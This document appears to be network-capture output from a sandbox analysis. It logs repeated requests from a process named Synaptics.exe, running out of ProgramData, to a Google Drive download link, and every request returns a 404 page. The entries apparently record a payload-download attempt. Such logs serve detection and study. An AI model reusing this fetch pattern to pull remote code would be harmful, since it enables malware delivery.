                                                                                                                                                                                        2022-05-17 11:31:35 UTC142OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC145INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2ifhuK/LARXPihni/X8C3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC147INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 6d 50 51 36 39 6d 56 42 4e 41 35 30 6c 76 46 2f 50 55 77 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3mPQ69mVBNA50lvF/PUwQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:35 UTC148INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:35 UTC149INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        49192.168.2.349798142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC145OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC149INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NHEXGovJX9zuS+8RoaF6+A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC150INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:35 UTC150INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2b 51 4d 38 2f 6c 2f 37 6f 46 4d 71 4a 35 4f 63 70 54 6d 56 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+QM8/l/7oFMqJ5OcpTmVIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:35 UTC151INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:35 UTC152INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        5192.168.2.349740142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:29 UTC15INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:29 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QG+lboCf5Gi2EGCEUGQtgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:29 UTC17INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:29 UTC17INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 7a 55 37 51 72 46 59 74 44 34 32 65 44 4e 72 2f 4d 66 5a 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xzU7QrFYtD42eDNr/MfZNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:29 UTC18INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:29 UTC18INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        50192.168.2.349799142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC149OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:35 UTC152INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KVmEr4SPczVyrQpTgZyxjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:35 UTC153INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 54 70 66 72 77 48 77 2f 37 4d 62 77 4c 67 70 49 66 39 79 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XTpfrwHw/7MbwLgpIf9y0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:35 UTC154INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:35 UTC155INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        51192.168.2.349800142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC155OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC155INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:35 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6tnvC0xY12taw1vnlZt0Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC156INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 74 6f 5a 42 4a 50 76 6f 4c 68 44 4b 62 47 36 75 30 75 7a 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rtoZBJPvoLhDKbG6u0uzvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:36 UTC158INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:36 UTC158INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        52192.168.2.349801142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:35 UTC155OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC158INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-F+3uIB/JKwEiFWg0CDMt5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
